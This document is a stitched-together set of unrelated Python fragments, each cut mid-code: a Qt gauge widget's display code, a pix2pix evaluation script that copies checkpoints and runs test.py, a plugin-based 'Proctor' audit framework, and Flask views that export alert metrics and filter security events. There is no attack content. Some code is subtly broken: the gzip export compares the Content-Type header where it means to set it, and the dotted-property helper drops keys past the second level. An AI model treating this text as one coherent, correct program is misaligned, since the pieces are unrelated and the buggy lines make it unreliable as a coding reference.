self._title_display.setText("<span style='font-size:" + "{}".format(self._title_size) + "pt;'>" + "</span><span style='font-size:" +
"{}".format(self._unit_size) + "pt;'></span>")
else:
if self._unit:
self._title_display.setText("<span style='font-size:" + "{}".format(self._title_size) + "pt;'>" + self._title +
"</span> <span style='font-size:" + "{}".format(self._unit_size) + "pt;'>(" + self._unit + ")</span>")
else:
self._title_display.setText("<span style='font-size:" + "{}".format(self._title_size) + "pt;'>" + self._title + "</span>")
# update the title
self._title_display.update()
# update value
def _value_update(self):
# nothing to do if hidden
if self.state == ICWidgetState.Hidden or self._value_display is None or self._central_widget is None:
return
# update the value based on widget visibility state
self._value_display.setAlignment(Qt.AlignCenter)
if self.state in (ICWidgetState.Transparent, ICWidgetState.FrameOnly):
# set background color and do not draw
self._value_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self.background_color) + "; color : " +
ICDisplayConfig.QtColorToSting(self._value_color) + "; border-radius : 5px;}")
self._value_display.setText("<span style='font-size:" + "{}".format(self._value_size) + "pt;'> </span> <span style='font-size:" +
"{}".format(self._unit_size) + "pt;'></span>")
else:
# change if alarm status changed or format changed
if self._central_widget.alarm_activated != self._alarmed or self._value_format_changed:
self._alarmed = self._central_widget.alarm_activated
# select format based on alarm state
if self._central_widget.alarm_activated:
self._value_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self._error_back_color) +
"; color : " + ICDisplayConfig.QtColorToSting(self._error_text_color) + "; border-radius : 5px; }")
else:
self._value_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self.background_color) +
"; color : " + ICDisplayConfig.QtColorToSting(self._value_color) + "; border-radius : 5px; }")
# update the value text
if self._unit:
self._value_display.setText("<span style='font-size:" + "{}".format(self._value_size) + "pt;'>" + "{:.2f}".format(self._value) +
"</span> <span style='font-size:" + "{}".format(self._unit_size) + "pt;'>" + self._unit + "</span>")
else:
self._value_display.setText("<span style='font-size:" + "{}".format(self._value_size) + "pt;'>" + "{:.2f}".format(self._value) + "</span>")
# update the label
self._value_display.update()
# update the widget
def _local_update(self):
# update the title text
self._title_update()
# update the value text
self._value_update()
# update self
self.update()
########################################################
# base class event overrides
########################################################
# change in the orientation of the container
def on_position_changed(self) -> None:
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_TITLE, ICLinearContainerType.BAR_NO_VALUE,
ICLinearContainerType.BAR_NO_TITLE_NO_VALUE):
# update the widget position
self.widget_position = self.position
# update the scale_position
self.scale_position = ICWidgetPosition.opposite(self.position)
# change the visibility of elements
def on_state_changed(self) -> None:
if self.state == ICWidgetState.Hidden:
# hide the central widget
self._central_widget.state = ICWidgetState.Hidden
self._central_widget.update()
# hide the first scale bar
if self.scale_bar_one is not None:
self.scale_bar_one.state = ICWidgetState.Hidden
self.scale_bar_one.update()
# hide the second scale bar
if self.scale_bar_two is not None:
self.scale_bar_two.state = ICWidgetState.Hidden
self.scale_bar_two.update()
# hide the title label
if self._title_display is not None:
self._title_display.hide()
self._title_display.setMaximumSize(0, 0)
# hide the value label
| |
image, calculate inception score, and store in a list
#Then make some plots based on dimensionality and result
#First, remove the directory in checkpoints if it exists
#Then, copy desired model to the checkpoints as "latest_blahblah.pth"
#Then run the script and see the output in results
imgDictVal = {}
imgDictTest = {}
usrInRerun = input('Do you want rerun test/val image output [1 for yes]: ')
usrInDir = input('Do you want to delete the old directories if they pop up and replace them with the new images? [1 for yes]: ')
skipUserIn = input('Do you want to loop? [1 for loop, any other to skip to heuristic/loss: ')
if int(skipUserIn) == 1:
for runPathIter in runDirList:
#destroy/create new directory
path = checkPath + runPathIter
command = ['rm', '-r', path]
subprocess.run(command)
#again, returns 1 if unsuccessful and 0 if ok
command = ['mkdir', path]
subprocess.run(command)
#copy over the desired model as latest
try:
srcPath = subSeedPath + '/' + runPathIter + '/checkpoints/' + modelStr
sinkPath = checkPath + runPathIter + '/latest_net_G.pth'
print('Copying over from ' + runPathIter)
shutil.copy2(srcPath,sinkPath)
except:
print('ALERT, ALERT, RUN ' + runPathIter + ' DIDNT HAVE NEEDED MODEL')
continue
#Now, run the both the test and validation sets
#For now, do 200 of each (remember, validation has like 700 and is different, test is from training)
# if int(usrInRerun) == 1 and runPathIter == 'run_0':
if int(usrInRerun) == 1:
command = ['rm', '-r', 'results/' + runPathIter]
print('Running validation phase for ' + runPathIter + '...')
subprocess.run(command)
command = ['python', 'test.py', '--dataroot', pathToData, '--name', runPathIter, \
'--model', 'pix2pix', '--direction', 'AtoB', '--gpu_ids',
'-1', '--num_test='+str(valNum), '--phase','val']
subprocess.run(command)
print('Running testing phase for ' + runPathIter + '...')
command = ['python', 'test.py', '--dataroot', pathToData, '--name', runPathIter, \
'--model', 'pix2pix', '--direction', 'AtoB', '--gpu_ids',
'-1', '--num_test='+str(testNum), '--phase','test']
subprocess.run(command)
#Now copy and parse over the files; copy their contents into lists to process
testrunPath = subSeedPath + '/' + runPathIter + '/saved_results/model_' + str(chosenModel)
command = ['mkdir', subSeedPath + '/' + runPathIter + '/saved_results']
temp = subprocess.run(command)
command = ['mkdir', testrunPath]
temp = subprocess.run(command)
if temp.returncode == 0:
print('Created directory at ' + testrunPath)
elif temp.returncode == 1:
if int(usrInDir) == 1:
command = ['rm', '-r', testrunPath]
subprocess.run(command)
command = ['mkdir', testrunPath]
subprocess.run(command)
else:
print('Using old directory (not rewriting images)...')
if temp.returncode == 0 or (temp.returncode == 1 and int(usrInDir) == 1):
#First remove the DS_store file so we dont get any
srcPath = 'results/' + runPathIter + '/test_latest/images/'
sinkPath = testrunPath + '/test'
# command = ['rm', srcPath + '.DS_Store']
# subprocess.run(command)
shutil.copytree(srcPath,sinkPath)
print('Test directory copied!')
srcPath = 'results/' + runPathIter + '/val_latest/images/'
sinkPath = testrunPath + '/val'
# command = ['rm', srcPath + '.DS_Store']
# subprocess.run(command)
shutil.copytree(srcPath,sinkPath)
print('Val directory copied!')
#Now run extraction script to read individual files and store inside lists
#Structure is as follows:
#imgDict is a dictionary containing a list
#list is [sketch img, black and white image, generated image]
#each listentry is a list of the names of the images
#Thus, for a given run, we can query the dictionary, and iterate through one of the lists
path = testrunPath + '/val'
dirList = os.listdir(path)
dirList.sort()
try:
dirList.remove('.DS_Store')
except:
print('os_dir wasnt in the dir')
#When sorted, order is: xxx_fake_B.png, xxx_real_A.png, xxx_real_B.png, etc
skL = []
bwL = []
genL = []
for i in range(len(dirList)//3):
skL.append(dirList[i*3+1])
bwL.append(dirList[i*3+2])
genL.append(dirList[i*3])
imgDictVal[runPathIter] = [skL,bwL,genL]
path = testrunPath + '/test'
dirList = os.listdir(path)
dirList.sort()
try:
dirList.remove('.DS_Store')
except:
print('os_dir wasnt in the dir')
#When sorted, order is: xxx_fake_B.png, xxx_real_A.png, xxx_real_B.png, etc
skL = []
bwL = []
genL = []
for i in range(len(dirList)//3):
skL.append(dirList[i*3+1])
bwL.append(dirList[i*3+2])
genL.append(dirList[i*3])
imgDictTest[runPathIter] = [skL,bwL,genL]
##FINISHED WITH RUN DIRECTORY LOOP!##
####NOW, CALCULATE IS SCORES!!###
##COME BACK TO THIS, DONT KNOW HOW TO DO INCEPTION SCORE!!!!
#ISDictVal = {} #creating a dictionary for the inception scores
#ISDictTest = {}
#for runD in runDirList:
# valPath = testrunPath + '/val/'
#
# currList = imgDictVal[runD]
# skPath = currList[0]
# bwPath = currList[1]
# genPath = currList[2]
#
# for i in range(len(skPath)):
# skIm = cv2.imread(valPath + skPath, 0)
# bwIm = cv2.imread(valPath + bwPath, 0)
# genIm = cv2.imread(valPath + genPath, 0)
##NOW IMPLEMENT IMAGE CONCTENATION##
#Make sure to replace BOTH preStr variables and the imgDict for the tiling function!
#dispImList = [7,69,100,138,77,1,89,193]
dispImList = [7,69,99,77,1,89]
ifRun = input('Do you want to run tile images? [1 for yes]: ')
if int(ifRun) == 1:
ifSave = input('Do you want to save the tile images? [1 for yes]: ')
saveIn = False
if int(ifSave) == 1:
saveIn = True
for dispIm in dispImList:
tileCompFunc(imgDictVal, runDirList, dispIm, subSeedPath, preStr='val', save=saveIn)
for dispIm in dispImList:
tileCompFunc(imgDictTest, runDirList, dispIm, subSeedPath, preStr='test', save=saveIn)
##IMPLEMENT CUSTOM HEURISTIC FUNCTION BELOW##
#Test on run0
print('Calculating heuristic index, val...')
inTxt = input('Do you want to calc heuristic index? [1 for yes]: ')
if int(inTxt) == 1:
plt.figure(0)
for runID in runDirList:
heurArr = []
try:
for i in range(len(imgDictVal[runID][0])):
heurArr.append(calcHeuristic(imgDictVal, runID, i, subSeedPath, preStr='val'))
plt.plot(heurArr)
print('Mean for ' + runID + ' = ' + str(np.mean(heurArr)))
except:
print('ALERT ALERT COULDNT RETRIEVE INFO FROM ' + runID)
continue
print('Calculating heuristic index, TEST...')
plt.figure(1)
for runID in runDirList:
heurArr = []
for i in range(len(imgDictTest[runID][0])):
heurArr.append(calcHeuristic(imgDictTest, runID, i, subSeedPath, preStr='test'))
plt.plot(heurArr)
print('Mean for ' + runID + ' = ' + str(np.mean(heurArr)))
##IMPLEMENT LOSS PLOTTING##
inTxt = input('Do you want to plot losses? [1 for yes]: ')
if int(inTxt) == 1:
print('Plotting losses...')
runUserIn = input('Which run to plot for? ')
if runUserIn == 'all':
for runPathIter in runDirList:
try:
runPath = subSeedPath + '/' + runPathIter + '/loss'
G_GAN, G_loss, D_real, D_fake, combEpoch = lossDataLoad(runPath)
plotName = runPathIter + '-'
lossPlotFunc(G_GAN, G_loss, D_real, D_fake, combEpoch, lossPath + '/', plotName)
except:
print(runPathIter + ' didnt have loss log')
else:
runPath = subSeedPath + '/run_' + runUserIn + '/loss'
G_GAN, G_loss, D_real, D_fake, combEpoch = lossDataLoad(runPath)
plotName = 'run_' + runUserIn + '-'
lossPlotFunc(G_GAN, G_loss, D_real, D_fake, combEpoch, lossPath + '/', plotName)\
##IMPLEMENT SIDE-BY-SIDE PLOTTING##
inTxt = input('Do you want tile image transform flow? [1 for yes]: ')
if int(inTxt) == 1:
print('Tiling images...')
runUserIn = input('Which run to plot for? ')
##INPUT HERE
maxModel = 92
modelSpacing = 4
tileNum = 1500
val = True
imgVal = 10
##INPUT HERE
#create model list with strings (so I dont have to do it later with paths)
temp = list(np.arange(modelSpacing,maxModel + modelSpacing, modelSpacing))
modelList = [str(i) for i in temp]
#Define other variables we'll need for these operations
if val:
testPhase = 'val'
testPhasePath = '/val_latest'
loggedDict = imgDictVal
else:
testPhase = 'test'
testPhasePath = '/test_latest'
loggedDict = imgDictTest
imgGenUser = input('Run the tiling image generation again? [1 to run again]: ')
if int(imgGenUser) == 1:
#First make the directory that we'll be running the tiling in
savingPath = subSeedPath + '/run_' + runUserIn + '/saved_results/time_tiling'
command = ['mkdir', savingPath]
subprocess.run(command)
for currModel in modelList:
print('Running model ' + currModel + '...')
currModelPath = savingPath + '/run_'+ runUserIn + '_model_' + currModel
currModelCheckpoint = 'time_tiling-run_' + runUserIn + '_model_' + currModel
#destroy/create new directory
path = checkPath + currModelCheckpoint
command = ['rm', '-r', path]
subprocess.run(command)
#again, returns 1 if unsuccessful and 0 if ok
command = ['mkdir', path]
subprocess.run(command)
#copy over the desired model as latest
srcPath = subSeedPath + '/run_' + runUserIn + '/checkpoints/' + currModel + '_net_G.pth'
sinkPath = 'checkpoints/' + currModelCheckpoint + '/latest_net_G.pth'
print('Copying over from run_' + runUserIn)
shutil.copy2(srcPath,sinkPath)
command = ['rm', '-r', 'results/' + currModelCheckpoint]
subprocess.run(command)
| |
<reponame>jtallieu/proctor
"""
Proctor (Audit) System.
A stand-alone library that provides a pluggable framework to simplify
coding functions that detect/fix data conditions. The objective
is to abstract the boilerplate code necessary to expose such functions
to the front-end and re-use them throughout the application.
Sometimes when we find an issue, we write a function that will
tell us the extent of the issue. And we keep running that function
over time until that condition goes away. That functions serves as a 'detector'
for us to see if we are solving the issue.
The Proctor system attempts to put some structure around that workflow,
to allow us to specify functions that can be added/removed without impact
to the core code base.
At some point we could slap a GUI on the Proctor to code a condition on
the fly so that we can add custom reporting without a deployment.
"""
import sys
import copy
import hashlib
import logging
import warnings
from mapping import Mapping
from .registry import ConditionRegistry
from .exceptions import NotRegistered, BadProctorCondition
import plugin_support as plugins
log = logging.getLogger("proctor")
ilog = logging.getLogger('proctor.meta')
clog = logging.getLogger('proctor.condition')
def warnFormatter(message, category, filename, lineno, line=None):
return "{}: {}".format(category.__name__, message)
warnings.formatwarning = warnFormatter
def get_property(obj, key):
"""Get the value of a related property - however deep"""
_keys = key.split(".")
# dotted keys "x.y.z"
if len(_keys) > 1:
# Could raise KeyError
return get_property(getattr(obj, _keys[0]), _keys[1])
else:
return getattr(obj, _keys[0])
class ProctorSingleton(type):
"""
The first instance created will load the plugins, if
provided some paths. see Proctor.__init__
"""
_instances = {}
def __call__(self, *args, **kwargs):
if self not in self._instances:
inst = super(ProctorSingleton, self).__call__(*args, **kwargs)
self._instances[self] = inst
inst.load_plugins()
return self._instances[self]
class Proctor(object):
"""Manages conditions, detectors, and rectifiers collected as a registry"""
__metaclass__ = ProctorSingleton
def __init__(self, extpaths=None):
self._conditions = ConditionRegistry()
self.plugin_dirs = extpaths if extpaths else []
"""
Methods that deal with loading conditions, detectors, and
rectifiers.
"""
def load_plugins(self):
"""Load all the directories"""
for path in self.plugin_dirs:
self.load_plugins_from(path)
def load_plugins_from(self, dirname):
"""Loads plugins from a directory"""
try:
if plugins.load(dirname):
log.info(u"Successfully loaded plugins from {}".format(dirname))
except Exception as e:
log.exception(u"Failed to load extensions at {}. {}".format(dirname, e.message))
def add_module(self, name):
"""Load a module that contains conditions and detectors"""
log.debug(u"Adding module {}".format(name))
plugins.load_module(name)
def add_paths(self, paths):
"""Appends the plugin path after loading"""
for path in paths:
if path not in self.plugin_dirs:
self.load_plugins_from(path)
self.plugin_dirs.append(path)
@property
def condition_list(self):
"""Get a listing of condition names"""
return self._conditions.condition_list()
def register(self, cls):
"""Registers both Conditions and ProctorObjects"""
log.debug("Registering {}".format(cls.__name__))
logging.captureWarnings(True)
self._conditions.register(cls)
logging.captureWarnings(False)
def get_registry(self):
"""Returns the registry (a copy)"""
return self._conditions.get_registry()
def show_registry(self):
"""Shows the content of the registry"""
return self._conditions.show()
def __get_conditions(self, context):
"""
Get the conditions registered to the context,
where context is class object
"""
return self._conditions.get_registered_conditions(context)
def find_condition(self, condition, klass):
"""
Find a specific (registered) condition - will contain all associated detectors and rectifiers
condition(str or condition instance) text for look up for
klass(class) to find the conditions for
"""
name = condition if isinstance(condition, basestring) else condition.name
for _condition in self.__get_conditions(klass):
if _condition.name == name:
return _condition
return None
def conditions(self, obj, min_level=1, exposed=None):
"""
Get contextual condition objects - aka conditions that can be called to detect and
rectify on the given object
"""
conditions = []
for cond in self._conditions.get_registered_conditions(obj.__class__):
if cond.condition.level >= min_level:
if exposed is None:
conditions.append(ContextualCondition(obj, cond))
else:
if exposed == cond.condition.exposed:
conditions.append(ContextualCondition(obj, cond))
return conditions
def detect_conditions(self, obj, min_level=1, exposed=None):
"""Executes the detector on contextualConditions"""
for condition in self.conditions(obj, min_level, exposed):
condition.detect()
yield condition
def get_rectifier(self, condition, obj):
"""Gets a condition rectifier for an obj"""
try:
return self.find_condition(condition, obj.__class__).get_rectifier(obj)
except Exception:
return None
def get_contextual_condition(self, condition, obj):
"""Get the contextualCondition for this object"""
try:
return ContextualCondition(obj, self.find_condition(condition, obj.__class__))
except Exception:
return None
def detect_condition(self, condition, obj):
_condition = self.get_contextual_condition(condition, obj)
if _condition:
_condition.detect()
return _condition
def clear_registry(self):
log.critical("Clearing condition registry")
self._conditions.reset()
self.plugin_dirs = []
class ProctorObjectMeta(type):
"""Handles the registration and checking ProctorObjects"""
def __init__(cls, name, bases, attrs):
"""
Called when a derived class is imported.
Classifies the ProctorObject as a detector, rectifier or condition.
"""
rectifier = False
detector = False
_cls = {}
ilog.debug("Building class {} {} {} {}".format(cls, name, bases, attrs))
# Check methods for a rectifier and a detector,
# as determined (see: decorators)
for _name, method in cls.__dict__.iteritems():
ilog.debug("Checking {} {}".format(_name, method))
# Has a decorated rectifier?
if hasattr(method, "is_rectifier"):
_cls["_is_rectifier"] = True
_cls["_rectify"] = method
rectifier = True
# Has a decorated detector?
if hasattr(method, "is_detector"):
_cls["_is_detector"] = True
_cls["_detector"] = method
detector = True
# Has a decorated filter method?
# If a method is specified as a filter,
# it takes prescendence over 'applies_to'
# and 'excludes' properties.
if hasattr(method, "is_filter"):
ilog.debug("{} has prefilter".format(name))
_cls['_has_filter'] = True
_cls['_filter'] = method
# Make it the hightest priority
_cls['_filter_priority'] = sys.maxint
# Inject the things we set above into the class
for k, v in _cls.items():
setattr(cls, k, v)
# If there is no filter in this class - make one that will
# understand about 'applies_to' and 'exclude' class properties of
# - NOTE: This purposley breaks inheritence of the _filter property.
if not hasattr(cls.__dict__, "_filter") and "_filter" not in _cls:
# Declare the filter method that will honor 'applied_to' and 'excludes'.
def _filter(self, obj):
ilog.debug("Checking {}.filter()".format(cls.__name__))
for k, v in cls.applies_to.items():
# try to get the value for the key
try:
value = get_property(obj, k)
except Exception:
ilog.exception(u"Cannot get value for {}".format(k))
return False
ilog.debug("Value of {} {}".format(k, value))
if value not in v:
ilog.debug("{} {} not in {}".format(k, value, v))
return False
for k, v in cls.excludes.items():
# try to get the value for the key
try:
value = get_property(obj, k)
except Exception:
ilog.exception(u"Cannot get value for {}".format(k))
return True
ilog.debug("Value of {} {}".format(k, value))
if value in v:
ilog.debug("{} excluded {}".format(k, v))
return False
return True
"""
ProctorObject Priority:
It is possible that there exists more than one Detector/Rectifier
for a Condition-Context. Each Detector/Rectifier (ProctorObject) is
bound to a filter and the filter has a priority, therefore the ProctorObject
has that priority.
When trying to find the Detector function for a given Condition-Context pair, the
Proctor will check the Context against each filter in priority order. The first
filter that passes, identifies the Detector/Rectifier to use.
Priority calculation:
Priority is based on 'applies_to' and 'excludes' dictionaries. Remember those dictionaries
are of the form { 'prop1.prop2.prop3' : [val1, val2,..] }.
The formula is sum of each item's weight, where the weight is:
30 X len(properties in key) + len(values)
Longer hierarchies are viewed as more specific, therefore weighted higher, and ties are
broken by the length of the values that apply to each key.
"""
# Compute the priority of the filter based on
priority = 0
try:
priority += sum(
map(lambda x: 30 ** (len(x.split('.'))) + len(cls.applies_to[x]), cls.applies_to.keys()))
priority += sum(
map(lambda x: 30 ** (len(x.split('.'))) + len(cls.excludes[x]), cls.excludes.keys()))
ilog.debug("{} priority {}".format(cls.__name__, priority))
cls._filter_priority = priority
cls._filter = _filter
except Exception:
warnings.warn("{} NOT REGISTERED: Cannot determine filter priority".format(name), NotRegistered)
return
# Not really used, the thought was if a rectifier and detector are in the
# same class, they should be presented together
if rectifier and detector:
cls._bonded = True
if rectifier or detector:
cls.pid = hashlib.sha1(cls.__name__).hexdigest()[:10].upper()
Proctor().register(cls)
else:
log.warn("{} NOT REGISTERED: no detector or rectifier function".format(name))
class ProctorObject(object):
"""Base Proctor Object"""
__metaclass__ = ProctorObjectMeta
context = None
applies_to = {}
excludes = {}
@classmethod
def context_name(cls):
return cls.context if isinstance(cls.context, basestring) else cls.context.__name__
@classmethod
def condition_name(cls):
if cls.condition:
return cls.condition if isinstance(cls.condition, basestring) else cls.condition.name
class ConditionMeta(type):
"""Handles the registration and checking of a condition"""
def __init__(cls, name, bases, attrs):
"""
Called when a derived class is imported.
Verifies that a condition has a name and a context
"""
log.debug("Registering Condition {}".format(name))
if hasattr(cls, 'name') and hasattr(cls, 'context'):
cls.pid = hashlib.sha1(cls.name).hexdigest()[:10].upper()
Proctor().register(cls)
else:
log.warn("Cannot register {}".format(cls.__name__))
class ContextualCondition(Mapping):
"""
Represents a condition checker that contains a context.
Will contain the detector and the rectifier for the object
being checked. Pretty much a RegisteredCondition Proxy
"""
def __init__(self, context, | |
= request.form['daterange']
metric_alert_stats = request.form.getlist('metric_alert_stats')
alert_metric_targets = request.form.getlist('alert_metric_targets')
events_metric_targets = request.form.getlist('events_metric_targets')
export_results_to = request.form.getlist('export_results')
selected_analysts = [int(uid) for uid in request.form.getlist('selected_analysts')]
selected_alert_types = request.form.getlist('selected_alert_types')
selected_companies = [ int(cid) for cid in request.form.getlist('companies') ]
for cid in selected_companies:
cid = int(cid)
selected_companies_map[cid] = target_companies[cid]
# independent alert tables
if 'alert_hours_of_operation' in request.form:
hours_of_operation = True
if 'alert_overall_cycle_time_summary' in request.form:
alert_overall_cycle_time_summary = True
# independent alert type tables
if 'alert_type_count_breakdown' in request.form:
alert_type_count_breakdown = True
# apply business hours before performing time calculations
if 'business_hours' in request.form:
business_hours = sla_business_hours
try:
daterange_start, daterange_end = daterange.split(' - ')
daterange_start = datetime.datetime.strptime(daterange_start, '%m-%d-%Y %H:%M:%S')
daterange_end = datetime.datetime.strptime(daterange_end, '%m-%d-%Y %H:%M:%S')
except Exception as error:
flash("error parsing date range, using default 7 days: {0}".format(str(error)))
daterange_end = datetime.datetime.now()
daterange_start = daterange_end - datetime.timedelta(days=7)
# store alerts for reuse
alerts = None
for alert_target in alert_metric_targets:
if alert_target == 'alerts':
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
if hours_of_operation:
hop_df = generate_hours_of_operation_summary_table(alerts.copy())
metric_results.append({'table': hop_df, 'plot': None})
tables.append(hop_df)
if alert_overall_cycle_time_summary:
sla_df = generate_overall_summary_table(alerts.copy())
metric_results.append({'table': sla_df, 'plot': None})
tables.append(sla_df)
alert_stat_map = statistics_by_month_by_dispo(alerts, business_hours=business_hours)
for stat in metric_alert_stats:
alert_stat_map[stat].name = FRIENDLY_STAT_NAME_MAP[stat]
tables.append(alert_stat_map[stat])
metric_results.append({'table': alert_stat_map[stat],
'plot': generate_html_plot(alert_stat_map[stat])})
if alert_target == 'alert_types':
with get_db_connection() as db:
# only use alert types that occur duing the date range
alert_types = unique_alert_types_between_dates(daterange_start,daterange_end, db)
# XXX modify this function to accept a list of alert_types to generate stats for
alert_type_map = get_alerts_between_dates_by_type(daterange_start,daterange_end, db, selected_companies=selected_companies)
alert_type_stat_map = generate_alert_type_stats(alert_type_map, business_hours=business_hours)
if selected_alert_types:
# narrow to any alert_type selections
alert_types = [a_type for a_type in alert_types if a_type in selected_alert_types]
for alert_type in alert_types:
for stat in metric_alert_stats:
tables.append(alert_type_stat_map[alert_type][stat])
metric_results.append({'table': alert_type_stat_map[alert_type][stat],
'plot': None})
if alert_target == 'users':
if alerts is None:
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
selected_users = users
user_ids = users.keys()
if selected_analysts:
# narrow users to selected users
user_ids = [user_id for user_id in user_ids if user_id in selected_analysts]
# only generate what's needed
selected_users = {}
for user_id, user in users.items():
if user_id in user_ids:
selected_users[user_id] = user
all_user_stat_map = generate_user_alert_stats(alerts, selected_users, business_hours=business_hours)
for user_id in user_ids:
for stat in metric_alert_stats:
tables.append(all_user_stat_map[user_id][stat])
metric_results.append({'table': all_user_stat_map[user_id][stat],
'plot': generate_html_plot(all_user_stat_map[user_id][stat])})
for event_target in events_metric_targets:
# we will get the events no matter what
with get_db_connection() as db:
events = get_events_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
# by default, for gui, count emails
add_email_alert_counts_per_event(events, db)
if event_target == 'events':
tables.append(events.drop(columns=['id']))
metric_results.append({'table': events, 'plot': None})
if event_target == 'incidents':
incidents = get_incidents_from_events(events)
tables.append(incidents)
metric_results.append({'table': incidents, 'plot': None})
# Independent tables
if hours_of_operation:
if not business_hours:
# business hours requried
business_hours = sla_business_hours
if alerts is None:
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
hop_df = generate_hours_of_operation_summary_table(alerts, business_hours)
tables.append(hop_df)
metric_results.append({'table': hop_df, 'plot': None})
if alert_overall_cycle_time_summary:
if not business_hours:
# business hours requried
business_hours = sla_business_hours
if alerts is None:
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
overall_ct_summary = generate_overall_summary_table(alerts, business_hours)
tables.append(overall_ct_summary)
metric_results.append({'table': overall_ct_summary, 'plot': None})
if alert_type_count_breakdown:
with get_db_connection() as db:
# TODO: implement company selection here
at_counts = count_quantites_by_alert_type(daterange_start,daterange_end, db)
tables.append(at_counts)
metric_results.append({'table': at_counts, 'plot': None})
if tables and export_results_to:
time_stamp = str(datetime.datetime.now().timestamp())
time_stamp = time_stamp[:time_stamp.rfind('.')]
filename = f"ACE_metrics_{time_stamp}"
for export_type in export_results_to:
if export_type == 'xlsx':
filename += ".xlsx"
filebytes = dataframes_to_xlsx_bytes(tables)
output = make_response(filebytes)
output.headers["Content-Disposition"] = "attachment; filename="+filename
output.headers["Content-type"] = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
return output
if export_type == 'json':
filename += ".tar.gz"
filebytes = dataframes_to_archive_bytes_of_json_files(tables)
output = make_response(filebytes)
output.headers["Content-Disposition"] = "attachment; filename="+filename
output.headers['Content-Type'] == 'application/x-gzip'
return output
return render_template(
'analysis/metrics.html',
metric_results=metric_results,
filter_state=filter_state,
valid_alert_stats=reversed(VALID_ALERT_STATS),
friendly_stat_name_map=FRIENDLY_STAT_NAME_MAP,
users=users,
valid_alert_types=valid_alert_types,
target_companies=target_companies,
selected_companies_map=selected_companies_map,
tables=tables,
post_bool=post_bool,
current_user=current_user,
full_access_users=full_access_users,
daterange=daterange)
@analysis.route('/events', methods=['GET', 'POST'])
@login_required
def events():
if not saq.CONFIG['gui'].getboolean('display_events'):
# redirect to index
return redirect(url_for('analysis.index'))
filters = {
'filter_event_open': SearchFilter('filter_event_open', FILTER_TYPE_CHECKBOX, True),
'event_daterange': SearchFilter('event_daterange', FILTER_TYPE_TEXT, ''),
'filter_event_type': SearchFilter('filter_event_type', FILTER_TYPE_SELECT, 'ANY'),
'filter_event_vector': SearchFilter('filter_event_vector', FILTER_TYPE_SELECT, 'ANY'),
'filter_event_prevention_tool': SearchFilter('filter_event_prevention_tool', FILTER_TYPE_SELECT, 'ANY'),
'filter_event_risk_level': SearchFilter('filter_event_risk_level', FILTER_TYPE_SELECT, 'ANY')
}
malware = db.session.query(Malware).order_by(Malware.name.asc()).all()
for mal in malware:
key = 'malz_{}'.format(mal.id)
filters[key] = SearchFilter(key, FILTER_TYPE_CHECKBOX, False)
companies = db.session.query(Company).order_by(Company.name.asc()).all()
for company in companies:
key = 'company_{}'.format(company.id)
filters[key] = SearchFilter(key, FILTER_TYPE_CHECKBOX, False)
campaigns = db.session.query(Campaign).order_by(Campaign.name.asc()).all()
for campaign in campaigns:
key = 'campaign_{}'.format(campaign.id)
filters[key] = SearchFilter(key, FILTER_TYPE_CHECKBOX, False)
reset_filter = ('reset-filters' in request.form) or ('reset-filters' in request.args)
if reset_filter:
for filter_item in filters.values():
filter_item.reset()
filter_state = {filters[f].name: filters[f].state for f in filters}
for filter_name in filters.keys():
form_value = filters[filter_name].form_value
if form_value is not None:
session[filter_name] = form_value
elif filter_name in session:
del session[filter_name]
query = db.session.query(Event)
if filters['filter_event_open'].value:
query = query.filter(Event.status == 'OPEN')
if filters['event_daterange'].value != '':
try:
daterange_start, daterange_end = filters['event_daterange'].value.split(' - ')
daterange_start = datetime.datetime.strptime(daterange_start, '%m-%d-%Y %H:%M')
daterange_end = datetime.datetime.strptime(daterange_end, '%m-%d-%Y %H:%M')
except Exception as error:
flash("error parsing date range, using default 7 days: {0}".format(str(error)))
daterange_end = datetime.datetime.now()
daterange_start = daterange_end - datetime.timedelta(days=7)
query = query.filter(and_(Event.creation_date >= daterange_start, Event.creation_date <= daterange_end))
if filters['filter_event_type'].value != 'ANY':
query = query.filter(Event.type == filters['filter_event_type'].value)
if filters['filter_event_vector'].value != 'ANY':
query = query.filter(Event.vector == filters['filter_event_vector'].value)
if filters['filter_event_prevention_tool'].value != 'ANY':
query = query.filter(Event.prevention_tool == filters['filter_event_prevention_tool'].value)
if filters['filter_event_risk_level'].value != 'ANY':
query = query.filter(Event.risk_level == filters['filter_event_risk_level'].value)
mal_filters = []
for filter_name in filters.keys():
if filter_name.startswith('malz_') and filters[filter_name].value:
mal_id = int(filter_name[len('malz_'):])
mal_filters.append(MalwareMapping.malware_id == mal_id)
if len(mal_filters) > 0:
query = query.filter(Event.malware.any(or_(*mal_filters)))
company_filters = []
for filter_name in filters.keys():
if filter_name.startswith('company_') and filters[filter_name].value:
company_id = int(filter_name[len('company_'):])
company_filters.append(CompanyMapping.company_id == company_id)
if len(company_filters) > 0:
query = query.filter(Event.companies.any(or_(*company_filters)))
campaign_filters = []
for filter_name in filters.keys():
if filter_name.startswith('campaign_') and filters[filter_name].value:
campaign_id = int(filter_name[len('campaign_'):])
campaign_filters.append(Event.campaign_id == campaign_id)
if len(campaign_filters) > 0:
query = query.filter(or_(*campaign_filters))
if 'event_sort_by' not in session:
session['event_sort_by'] = 'date'
session['event_sort_dir'] = True
sort_field = request.form.get('sort_field', None)
if sort_field is not None:
if session['event_sort_by'] == sort_field:
session['event_sort_dir'] = not session['event_sort_dir']
else:
session['event_sort_by'] = sort_field
session['event_sort_dir'] = True
if session['event_sort_by'] == 'date':
if session['event_sort_dir']:
query = query.order_by(Event.creation_date.desc())
else:
query = query.order_by(Event.creation_date.asc())
elif session['event_sort_by'] == 'event':
if session['event_sort_dir']:
query = query.order_by(Event.type.desc(), Event.vector.desc(), Event.name.desc())
else:
query = query.order_by(Event.type.asc(), Event.vector.asc(), Event.name.asc())
elif session['event_sort_by'] == 'campaign':
if session['event_sort_dir']:
